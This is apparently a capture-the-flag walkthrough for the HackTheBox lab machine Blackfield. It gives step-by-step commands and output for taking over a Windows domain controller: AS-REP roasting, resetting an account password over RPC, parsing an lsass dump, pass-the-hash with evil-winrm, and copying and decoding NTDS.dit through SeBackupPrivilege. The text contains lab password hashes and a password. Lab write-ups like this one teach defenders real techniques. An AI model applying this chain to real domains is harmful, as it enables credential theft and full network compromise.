Blackfield 10.10.10.192

I know the sky is not the limit because there are footprints on the Moon — and I made some of them! #Buzz Aldrin

Background

Blackfield is a Windows machine from HackTheBox, that is focusing on the enumeration technique, for training your ethical hacking skills and penetration testing skills.

After basic enumeration, this Windows server was a Domain Controller (DC) in the blackfield.local domain. After reconnaissance, a set of user's account was publicly available to view. This DC used Kerberos service. With this user list, I got a non-preauth AS_REP response. Finally, I got the access of a user 'support' account.

Using this support account, I reset the password of a user "Audit2020" and got access to this account. This account has the access rights on the ‘forensic’ shared folder and through this shared folder I could download several files, among others lass.dmp. Decode this file, I got the NTLM hash of the user account svc_backup.

This svc_backup account is the service account for system backup that is a member of the Security Group ‘Backup Operators’. This account has rights to back the critical file, NTDS.dit , and also has permission to execute the program DiskShadow.exe.

After retrieved the NTDS file and decoded it, I go the NTLM hash of the administrative account. 130n@calvinlai.com

Target Machine: 10.10.10.192

Attacker Machine: 10.10.14.8

Knowledge

Windows
Active Directory
Powershell
Account Misconfiguration
Kerberoasting
File System Forensics

Hacking Process Part 0 – Service Scanning

Quick Pre-searching

Details Analysis

Enumeration strategies According to the nmap result, the target machine is a Domain Controller in the backfield.local , this server has the hostname DC01, the interesting ports are tcp/445 for SMB, 88/tcp for Kerberos, and 389/tcp for LDAP.

Check SMB (445)
Check kerberos-sec (88)
Check LDAP (339)

Hacking Process Part 1 – Enumeration

SMB Enumeration

Started with the enumeration of the SMB protocol by checking the default account access, but nothing information returned. After that, using enum4linux gethered the SMB service of target machine and didn't have any usful information.

Two shared folders (forensic, profiles$) are found using the smbclient and a list of user profile folder list is found at the //10.10.10.192/profiles$. It may be useful, let check this user list using

Hacking Process Part 2 – Initial Low Privilege Access

Enumeration through RPC

As the target provides the AD service, let use the folder name to create a user list file and check with GetNPUsers.py program to find out the "real" user account actually present in the Active Directory and try to capture the NTLM hash. Exported the shares to a file named ‘userlist.txt’, and check of the usernames are existing and if they have Kerberos pre-authentication enabled, using the parament -format john that sent founded captured Ticket-Gain-Tickets to john for cracking. Finally, the following three accounts existed at the Active Directory and the password of "support was found. 1. audit2020 2. support 3. svc_backup

Initial access with the account "support"

Login the "blackfield.local/support" account with the password ":#00^BlackKnight". It was confirmed that the user list and user gourp of the AD service. After futher recon, this account cannot access other SMB share folder and no other information can be found under this . Before swithing to other strategy, if it is a "support" account, can I do some support service, such as create account, reset account password...etc.

Googled an article explains how to change a password via rpcclient. Finally, I was able to change the password of the account audit2020 to ‘abcd@1234’.

~$ rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[audit2020] rid:[0x44f]
user:[support] rid:[0x450]
user:[svc_backup] rid:[0x585]
user:[lydericlefebvre] rid:[0x586]

~$ rpcclient $> enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]

Jump to account "audit2020"

This user account can access the share folder "forensic". Jumped to this user "aduit2020", however, no luck to get the user flag. It is not the target user account. I downloaded all the files at this forensic account and found a interesting file lass.DMP under memory_analysis folder.

~$ smbclient //10.10.10.192/forensic  -U audit2020 --socket-options='TCP_NODELAY IPTOS_LOWDELAY SO_KEEPALIVE SO_RCVBUF=131072 SO_SNDBUF=131072' -t 40000                                                                               
Enter BLACKFIELD.LOCAL\audit2020's password:                                                                                                                                                                 
Try "help" to get a list of possible commands.                                                                                                                                                               
smb: \> ls                                                                                                                                                                                                   
  .                                   D        0  Sun Feb 23 08:03:16 2020                                                                                                                                   
  ..                                  D        0  Sun Feb 23 08:03:16 2020                                                                                                                                   
  commands_output                     D        0  Sun Feb 23 13:14:37 2020                                                                                                                                   
  memory_analysis                     D        0  Thu May 28 16:28:33 2020                                                                                                                                   
  tools                               D        0  Sun Feb 23 08:39:08 2020

                7846143 blocks of size 4096. 4108744 blocks available
smb: \> smb: \> recurse on
smb: \> prompt off
smb: \> mget *
getting file \commands_output\domain_admins.txt of size 528 as domain_admins.txt (3.8 KiloBytes/sec) (average 3.8 KiloBytes/sec)
getting file \commands_output\domain_groups.txt of size 962 as domain_groups.txt (6.8 KiloBytes/sec) (average 5.3 KiloBytes/sec)
getting file \commands_output\domain_users.txt of size 16454 as domain_users.txt (110.8 KiloBytes/sec) (average 41.6 KiloBytes/sec)
getting file \commands_output\firewall_rules.txt of size 518202 as firewall_rules.txt (1284.4 KiloBytes/sec) (average 642.4 KiloBytes/sec)
getting file \commands_output\ipconfig.txt of size 1782 as ipconfig.txt (12.2 KiloBytes/sec) (average 548.4 KiloBytes/sec)
getting file \commands_output\netstat.txt of size 3842 as netstat.txt (27.6 KiloBytes/sec) (average 483.6 KiloBytes/sec)
getting file \commands_output\route.txt of size 3976 as route.txt (28.1 KiloBytes/sec) (average 432.6 KiloBytes/sec)
getting file \commands_output\systeminfo.txt of size 4550 as systeminfo.txt (30.2 KiloBytes/sec) (average 389.7 KiloBytes/sec)
getting file \commands_output\tasklist.txt of size 9990 as tasklist.txt (69.2 KiloBytes/sec) (average 360.0 KiloBytes/sec)
getting file \memory_analysis\conhost.zip of size 37876530 as conhost.zip (1599.9 KiloBytes/sec) (average 1523.4 KiloBytes/sec)
getting file \memory_analysis\ctfmon.zip of size 24962333 as ctfmon.zip (1704.1 KiloBytes/sec) (average 1589.8 KiloBytes/sec)
getting file \memory_analysis\dfsrs.zip of size 23993305 as dfsrs.zip (1727.9 KiloBytes/sec) (average 1625.5 KiloBytes/sec)
getting file \memory_analysis\dllhost.zip of size 18366396 as dllhost.zip (1628.9 KiloBytes/sec) (average 1626.1 KiloBytes/sec)
getting file \memory_analysis\ismserv.zip of size 8810157 as ismserv.zip (1689.3 KiloBytes/sec) (average 1630.8 KiloBytes/sec)
getting file \memory_analysis\lsass.zip of size 41936098 as lsass.zip (1658.7 KiloBytes/sec) (average 1638.2 KiloBytes/sec)

memory_analysis\lsass.DMP

There is a program "volatility" under tool folder which can be used for analyzing memory dumps. This lasass.DMP may be the dump result from lsass.exe, which contains the password hash.

Tried read out the lsass.dmp using different method, first I tried with volatility to read out the DMP file, but couldn’t get it to work on my Kali machine. Finally, used the Python version of Mimikatz, pypykatz. Lucky, another user account "svc_backup" was found with a NTLM hash.

~$ pypykatz lsa minidump lsass.DMP
INFO:root:Parsing file lsass.DMP
FILE: ======== lsass.DMP =======
== LogonSession ==
authentication_id 406458 (633ba)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
        == MSV ==
                Username: svc_backup
                Domain: BLACKFIELD
                LM: NA
                NT: 9658d1d1dcd9250115e2205d9f48400d
                SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
        == WDIGEST [633ba]==
                username svc_backup
                domainname BLACKFIELD
                password None
        == SSP [633ba]==
                username 
                domainname 
                password None
        == Kerberos ==
                Username: svc_backup
                Domain: BLACKFIELD.LOCAL
                Password: None
        == WDIGEST [633ba]==
                username svc_backup
                domainname BLACKFIELD
                password None

Using the Evil-WinRM I can just pass the hash to login

~$ evil-winrm -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -i 10.10.10.192

This account "svc_backup" have the user flag at the Desktop folder. Let's go for Privilege Escalation.

*Evil-WinRM* PS C:\Users\svc_backup\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> ls


    Directory: C:\Users\svc_backup\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        6/18/2020   6:53 PM             34 user.txt


*Evil-WinRM* PS C:\Users\svc_backup\Desktop> cat user.txt
dfe91a601341819d2ca0cca082495551

Hacking Process Part 3 – Privilege Escalation

The support account has the support fuction, audit account can access the backup file, will this svc_backup account has system backup function?

Starting check who am i and what access rights I have, A quick check on the privileges of this account that this user is member of the group "Backup Operations" and it have two ‘extra’ privileges, i.e. SeBackupPrivilege and SeRestorePrivilege which are able to back-up critical system files on this Domain Controller.

*Evil-WinRM* PS C:\Users\svc_backup\Documents> net user svc_backup
User name                    svc_backup
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2/23/2020 10:54:48 AM
Password expires             Never
Password changeable          2/24/2020 10:54:48 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   2/23/2020 11:03:50 AM

Logon hours allowed          All

Local Group Memberships      *Backup Operators     *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc_backup\Documents>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\svc_backup\Documents>

My target is to get the NTDS.dit file by creating a Volume Shadow Copy which the files are being locked. In addition, I need the SYSTEM hive from the registry which is containing the boot key, which is used to decrypt the NTDS.dit. Googled, diskshadow.exe is the program to use to create Volume Shadow Snapshots (VSS) of disks and expose them as a folder or as a Driveletter.

Get the NTDS.dit

Even the SeBackupPrivilege is enable, but the system security still not allow me to dump the ntds.dit file. First we need to get the permissions in the file NTDS.dit by following the instruction of this https://github.com/giuliano108/SeBackupPrivilege

Evil-WinRM* PS C:\Users\svc_backup\Documents> Import-Module ./Set-SeBackupPrivilege.dll
Evil-WinRM* PS C:\Users\svc_backup\Documents> Import-Module ./SeBackupPrivilegeUtils.dll
Evil-WinRM* PS C:\Users\svc_backup\Documents> Set-SeBackupPrivilege

Once I have the privileges, next steps, execute the program DiskShadow.exe with the scripts (DiskShadow.exe /s ), which is creating a Volume Shadow Copy and expose the VSS with the Driveletter Z:.

set context persistent nowriters 
set metadata c:\temp\example.cab 
set verbose on 
begin backup 
add volume c:\ alias systemvolume 
create 
expose %systemvolume% z: 
end backup

Evil-WinRM* PS C:\Users\svc_backup\Documents> diskshadow /s script.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  DC01,  9/22/2020 3:00:44 PM

-> set context persistent nowriters
-> set metadata c:\temp\example.cab
-> set verbose on
-> begin backup
-> add volume c:\ alias systemvolume
-> create

Alias systemvolume for shadow ID {a402221f-ec65-43af-b956-3e2baa45fa43} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {2520bff5-0a72-46f3-b718-e47519722936} set as environment variable.
Inserted file Manifest.xml into .cab file example.cab
Inserted file Dis5346.tmp into .cab file example.cab

Querying all shadow copies with the shadow copy set ID {2520bff5-0a72-46f3-b718-e47519722936}

	* Shadow copy ID = {a402221f-ec65-43af-b956-3e2baa45fa43}		%systemvolume%
		- Shadow copy set: {2520bff5-0a72-46f3-b718-e47519722936}	%VSS_SHADOW_SET%
		- Original count of shadow copies = 1
		- Original volume name: \\?\Volume{351b4712-0000-0000-0000-602200000000}\ [C:\]
		- Creation time: 9/22/2020 3:00:44 PM
		- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
		- Originating machine: DC01.BLACKFIELD.local
		- Service machine: DC01.BLACKFIELD.local
		- Not exposed
		- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
		- Attributes:  No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1
-> expose %systemvolume% z:
-> %systemvolume% = {a402221f-ec65-43af-b956-3e2baa45fa43}
The shadow copy was successfully exposed as z:\.
-> end backup 
*Evil-WinRM* PS C:\Users\svc_backup\Documents>

Using the Copy-FileSeBackupPrivilege to get the ntds.dit file and the system.bak (the key of this ntds) that get from the registry

*Evil-WinRM* PS C:\Users\svc_backup\Documents> Copy-FileSeBackupPrivilege z:\window\ntds\ntds.dit C:\Users\svc_backup\Documents\ntds.dit
*Evil-WinRM* PS C:\Users\svc_backup\Documents> download ntds.dit
Info: Downloading C:\Users\svc_backup\Documents\ntds.dit to ntds.dit

Info: Download successful!

*Evil-WinRM* PS C:\Users\svc_backup\Documents> reg.exe save hklm\system .\system.bak
The operation completed successfully.

*Evil-WinRM* PS C:\Users\svc_backup\Documents> download system.bak
Info: Downloading C:\Users\svc_backup\Documents\system.bak to system.bak

Info: Download successful!

With the secretsdump.py to extract the NTDS.dit and read the hashes.

root@kclai:~/Documents/ctf/htb/windows/16_Blackfield/exploit/audit2020_file# /root/Documents/ctf/tools/win/impacket-0.9.20/examples/secretsdump.py -ntds ./ntds.dit -system ./system.bak LOCAL >dumpntds.txt
root@kclai:~/Documents/ctf/htb/windows/16_Blackfield/exploit/audit2020_file# cat dumpntds.txt 
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ./ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:9e3d10cc537937888adcc0d918813a24:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654aa:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
BLACKFIELD.local\BLACKFIELD764430:1105:aad3b435b51404eeaad3b435b51404ee:a658dd0c98

Dumping to the Administrator account

With the administrator's NTML hash using the Evil-WinRM to create a session with the Administrator-account.

root@kclai:~/Documents/ctf/tools/win/evil-winrm# ./evil-winrm.rb  -u administrator -H 184fb5e5178480be64824d4cd53b99ee -i 10.10.10.192

Evil-WinRM shell v2.0

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
blackfield\administrator

Post Exploitation

*Evil-WinRM* PS C:\Users\Administrator\desktop> type notes.txt
Mates,

After the domain compromise and computer forensic last week, auditors advised us to:
- change every passwords -- Done.
- change krbtgt password twice -- Done.
- disable auditor's account (audit2020) -- KO.
- use nominative domain admin accounts instead of this one -- KO.

We will probably have to backup & restore things later.
- Mike.

PS: Because the audit report is sensitive, I have encrypted it on the desktop (root.txt)
*Evil-WinRM* PS C:\Users\Administrator\desktop> systeminfo

Host Name:                 DC01
OS Name:                   Microsoft Windows Server 2019 Standard
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Primary Domain Controller
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00429-00521-62775-AA435
Original Install Date:     2/1/2020, 12:04:40 PM
System Boot Time:          9/23/2020, 3:11:49 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                           [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              fr;French (France)
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory:     4,095 MB
Available Physical Memory: 2,540 MB
Virtual Memory: Max Size:  4,799 MB
Virtual Memory: Available: 3,387 MB
Virtual Memory: In Use:    1,412 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    BLACKFIELD.local
Logon Server:              \\DC01
Hotfix(s):                 7 Hotfix(s) Installed.
                           [01]: KB4552924
                           [02]: KB4494174
                           [03]: KB4512577
                           [04]: KB4523204
                           [05]: KB4537759
                           [06]: KB4549947
                           [07]: KB4565349
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet0 2
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.192
                                 [02]: fe80::fc75:4ec7:3972:a98a
                                 [03]: dead:beef::fc75:4ec7:3972:a98a
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

Recommendation

This Lab is a sample of Kerberoasting attack, how to prevent it....

Mitigating the brute-forcing aspect of the attack, using the offline brute-force attack the hash dump file to get the initial access acount. Choosing a strong complex password for system account.
SMB Sharing, becareful what kinds of information be shared that may be used to exploitation. If I cannot get the potential user account list, the brute-force attack cannot be success.
Think about what your service accounts have access to, special privilege account can be a risk vectors for unauthorized access.

Reference Link

https://decoder.cloud/2018/02/12/the-power-of-backup-operatos/ https://serverfault.com/questions/990231/windows-backup-operators-and-network-access https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug https://github.com/giuliano108/SeBackupPrivilege https://pure.security/dumping-windows-credentials/ https://pentestlab.blog/tag/ntds-dit/

PreviousLove 10.10.10.239 NextRemote 10.10.10.180

Last updated 4 years ago

Was this helpful?